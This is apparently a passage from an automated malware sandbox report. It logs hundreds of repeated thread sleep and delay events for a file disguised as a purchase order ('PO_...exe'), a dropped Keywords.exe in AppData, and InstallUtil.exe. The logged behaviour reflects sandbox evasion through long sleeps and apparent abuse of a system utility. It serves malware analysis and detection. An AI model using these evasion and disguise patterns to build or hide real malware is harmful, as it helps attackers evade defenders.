Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -97656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -97547s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -97437s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -97328s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -97219s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -97109s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -97000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -96890s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -96781s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -96672s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -96562s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -96297s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -96172s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -96062s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -95953s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -95843s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -95734s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -95616s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -95515s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -95406s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -95296s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -95187s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -95077s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -94968s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -94849s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -94734s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep count: 41 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -37815825351104557s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2192	Thread sleep count: 3572 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -599839s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2192	Thread sleep count: 6244 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -599588s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -599484s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -599375s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -599266s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -599129s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -598891s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -598672s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -598563s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -598344s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -598219s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -598110s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -597985s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -597860s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -597735s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -597610s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -597485s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -597360s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -597235s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -597108s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -597000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -596891s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -596781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -596672s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -596562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -596453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -596344s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -596219s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -596110s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -595985s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -595860s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -595735s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -595610s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -595485s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -595360s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -595235s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -595110s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -594985s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -594860s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -594735s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -594610s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -594485s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -594360s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -594235s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -594110s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2620	Thread sleep time: -593985s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Thread delayed: delay time: 99874	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Thread delayed: delay time: 99765	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Thread delayed: delay time: 99656	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Thread delayed: delay time: 99546	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Thread delayed: delay time: 99437	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Thread delayed: delay time: 99328	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Thread delayed: delay time: 99219	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Thread delayed: delay time: 99109	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Thread delayed: delay time: 99000	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Thread delayed: delay time: 98890	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Thread delayed: delay time: 98778	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Thread delayed: delay time: 98656	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Thread delayed: delay time: 98392	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Thread delayed: delay time: 98223	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Thread delayed: delay time: 98047	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Thread delayed: delay time: 97937	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Thread delayed: delay time: 97828	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Thread delayed: delay time: 97718	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Thread delayed: delay time: 97609	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Thread delayed: delay time: 97500	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Thread delayed: delay time: 97390	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Thread delayed: delay time: 97280	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Thread delayed: delay time: 97172	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Thread delayed: delay time: 97047	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Thread delayed: delay time: 96937	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Thread delayed: delay time: 96828	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Thread delayed: delay time: 96718	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Thread delayed: delay time: 96609	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Thread delayed: delay time: 96500	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Thread delayed: delay time: 96376	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Thread delayed: delay time: 96250	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Thread delayed: delay time: 96140	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Thread delayed: delay time: 96031	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Thread delayed: delay time: 95922	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Thread delayed: delay time: 95812	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Thread delayed: delay time: 95651	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598780	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596919	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596692	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596577	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594714	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594607	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 99843	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 99734	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 99625	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 99515	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 99402	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 99290	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 99171	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 99051	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 98833	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 98672	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 98531	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 98421	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 98310	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 98203	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 98093	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 97984	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 97875	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 97765	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 97656	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 97547	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 97437	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 97328	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 97219	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 97109	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 97000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 96890	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 96781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 96672	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 96562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 96297	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 96172	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 96062	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 95953	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 95843	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 95734	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 95616	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 95515	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 95406	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 95296	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 95187	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 95077	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 94968	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 94849	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 94734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599839	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599588	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599266	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599129	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597360	Jump to behavior
